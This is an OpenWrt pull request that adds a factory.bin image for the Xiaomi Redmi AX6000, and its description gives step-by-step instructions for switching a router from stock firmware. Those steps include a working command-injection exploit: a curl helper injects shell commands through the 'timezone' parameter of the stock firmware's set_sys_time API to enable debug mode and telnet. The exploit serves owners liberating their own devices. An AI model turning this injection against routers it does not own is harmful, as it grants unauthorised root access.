### PR TITLE
mediatek: add factory.bin image for Redmi AX6000

### DIFF
--- a/target/linux/mediatek/image/filogic.mk
+++ b/target/linux/mediatek/image/filogic.mk
@@ -134,7 +134,10 @@ define Device/xiaomi_redmi-router-ax6000
   UBINIZE_OPTS := -E 5
   BLOCKSIZE := 128k
   PAGESIZE := 2048
+  IMAGE_SIZE := 30720k
   KERNEL_IN_UBI := 1
+  IMAGES += factory.bin
+  IMAGE/factory.bin := append-ubi | check-size $$$$(IMAGE_SIZE)
   IMAGE/sysupgrade.bin := sysupgrade-tar | append-metadata
 endef
 TARGET_DEVICES += xiaomi_redmi-router-ax6000


### PR DESCRIPTION
This commit creates factory.bin image with partition size fitting stock ubi partition, allowing for easy switch from stock to OpenWrt without the need of serial console or opening of the router. It relies on the fact that first partition of stock partition layout has same starting address as OpenWrt layout. It was successfully tested twice, on two different AX6000 routers.

The basic idea is following:
 - Make sure that original Xiaomi firmware is started from ubi1 (the second) partition.
 - We flash 30MB factory.bin image to ubi (first) partition. This image differs only in partition size compared to regular sysupgrade.bin image.
 - We configure nvram variables to boot system from ubi (first) partition with OpenWrt partition table.
 - We perform regular syspupgrade over web UI or terminal to finalize the switch to regular OpenWrt images using whole flash space.

Make sure that you read AX600 OpenWrt wiki page, since this procedure assumes you understand the basics from there:
https://openwrt.org/toh/xiaomi/redmi_ax6000

The procedure was tested with Xiaomi firmware version 1.0.48, so it is recommended to use the same version.

Detailed steps are as follows (each step description starts with "destination" of where the commands are executed):
1. PC: prepare router-execute shell function for easy exploit usage
```
$ MIWIFI_IP=192.168.31.1
$ MIWIFI_STOK=<stok>
$ router-execute() { curl -v -G --data-urlencode "timezone=';$*;" "http://$MIWIFI_IP/cgi-bin/luci/;stok=$MIWIFI_STOK/api/misystem/set_sys_time"; }
```

2. PC: use exploit to enable debug mode
```
$ router-execute 'echo pVoAAA== | base64 -d | mtd write - crash'
$ router-execute reboot
```

3. PC: connect to router in debug mode
```
$ telnet $MIWIFI_IP
```

4. router: enable telnet, ssh and UART console permanently)
```
$ bdata set telnet_en=1
$ bdata set ssh_en=1
$ bdata set uart_en=1
$ bdata commit
$ reboot
```

5. PC: connect to router in debug mode
```
$ telnet $MIWIFI_IP
```

6. router: disable debug mode
```
$ mtd erase crash
$ reboot
```

7. PC: generate default root password and login to router using generated password
```
$ ./unlock_pwd.py <serial-no>
$ telnet $MIWIFI_IP
```

8. router: ensure firmware=1 is found in cmdline. If firmware=0 is shown instead, then just flash same firmware 1.0.48 one more time through stock web interface, which will force it to switch to the other partition
```
$ cat /proc/cmdline
```

9. router: ensure nvram has same values like bdata
```
$ nvram set telnet_en=1
$ nvram set ssh_en=1
$ nvram set uart_en=1
$ nvram commit
```

10. router: force debug software channel to enable SSH temporarily
```
$ sed -i 's#`/sbin/uci get.*CHANNEL`#debug#' /etc/init.d/dropbear
$ /etc/init.d/dropbear start
$ exit
```

11. PC: copy factory image over SSH
```
$ scp -O openwrt-mediatek-filogic-xiaomi_redmi-router-ax6000-squashfs-factory.bin root@192.168.31.1:/tmp
$ telnet $MIWIFI_IP
```

12. router: flash factory.bin image to ubi partition
```
$ ubiformat /dev/mtd8 -f /tmp/openwrt-mediatek-filogic-xiaomi_redmi-router-ax6000-squashfs-factory.bin
```

13. router: configure nvram boot options
```
$ nvram set boot_wait=on
$ nvram set flag_boot_rootfs=0
$ nvram set flag_last_success=1
$ nvram set flag_boot_success=1
$ nvram set flag_try_sys1_failed=8
$ nvram set flag_try_sys2_failed=8
$ nvram set mtdparts="nmbm0:1024k(bl2),256k(Nvram),256k(Bdata),2048k(factory),2048k(fip),256k(crash),256k(crash_log),112640k(ubi)"
$ nvram commit
```

14. router: we are ready for reboot to OpenWrt :)
```
$ reboot
```

15. router: flash sysupgrade.bin through luci web

Signed-off-by: Aleksandar Krsteski <alekrsteski@gmail.com>
